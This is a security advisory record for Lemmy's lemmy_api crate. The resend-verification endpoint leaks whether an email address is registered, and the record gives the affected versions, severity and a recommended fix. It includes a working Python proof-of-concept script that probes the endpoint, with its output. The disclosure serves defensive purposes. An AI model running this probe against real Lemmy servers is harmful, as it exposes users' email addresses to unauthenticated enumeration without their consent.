GHSA-qxrw-f6fh-34r7

Suggest an improvement
Source
https://github.com/advisories/GHSA-qxrw-f6fh-34r7
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-qxrw-f6fh-34r7/GHSA-qxrw-f6fh-34r7.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-qxrw-f6fh-34r7
Published
2026-05-06T23:49:18Z
Modified
2026-05-07T00:03:51.724570Z
Severity
  • 5.5 (Medium) CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P CVSS Calculator
Summary
Lemmy resend-verification endpoint exposes registered email addresses to unauthenticated users
Details

Summary

The unauthenticated resend-verification endpoint returns different responses for registered and unregistered email addresses. A malicious third party can submit candidate addresses to /api/v4/account/auth/resend_verification_email and distinguish accounts from misses.

Details

resend_verification_email() looks up the submitted address and returns the lookup error to the caller:

let local_user_view = LocalUserView::find_by_email(&mut context.pool(), &email).await?;
check_local_user_valid(&local_user_view)?;

The password reset endpoint already uses a safer pattern. It discards lookup errors and returns success, which prevents the same account-discovery channel.

Proof of Concept

The following script creates one user and probes that address plus a missing address.

import requests, random, string

BASE = "http://127.0.0.1:8536/api/v4"  # change to the target Lemmy URL
ADMIN_USER = "lemmy"
ADMIN_PASS = "lemmylemmy"
PASSWORD = "Password123456!"

def post(path, **body):
    return requests.post(BASE + path, json=body)

suffix = "enum" + "".join(random.choice(string.ascii_lowercase) for _ in range(6))
admin = post("/account/auth/login", username_or_email=ADMIN_USER, password=ADMIN_PASS).json()["jwt"]
requests.put(BASE + "/site", headers={"Authorization": "Bearer " + admin},
             json={"registration_mode": "open", "email_verification_required": False})

email = "alice" + suffix + "@example.test"
post("/account/auth/register", username="alice" + suffix, password=PASSWORD,
     password_verify=PASSWORD, email=email).raise_for_status()

for candidate in [email, "missing" + suffix + "@example.test"]:
    r = post("/account/auth/resend_verification_email", email=candidate)
    print(candidate, "HTTP", r.status_code, r.text[:300])

Output:

alicepoceudtpf@example.test HTTP 200 {"success":true}
missingpoceudtpf@example.test HTTP 404 {"error":"not_found","cause":"Record not found"}

Impact

A malicious third party can enumerate registered email addresses without authentication. The endpoint uses the registration rate limit bucket, not an endpoint-specific anti-enumeration limit, so the attacker can automate probes across candidate address lists. The response also distinguishes missing accounts from banned or deleted accounts because check_local_user_valid() returns separate error types.

Recommended Fix

Use the password-reset pattern for resend verification. Move the lookup and email-send work into a helper, ignore helper errors in the handler, and always return {"success": true} for syntactically valid input.

Found by aisafe.io

Database specific 
{
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-06T23:49:18Z",
    "cwe_ids": [
        "CWE-204"
    ],
    "severity": "MODERATE",
    "nvd_published_at": null
}
References

Affected packages

crates.io / lemmy_api

Package

Name
lemmy_api
View open source insights on deps.dev
Purl
pkg:cargo/lemmy_api

Affected ranges

Type
SEMVER
Events
Introduced
0Unknown introduced version / All previous versions are affected
Last affected
0.19.1-rc.1

Database specific

source 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-qxrw-f6fh-34r7/GHSA-qxrw-f6fh-34r7.json"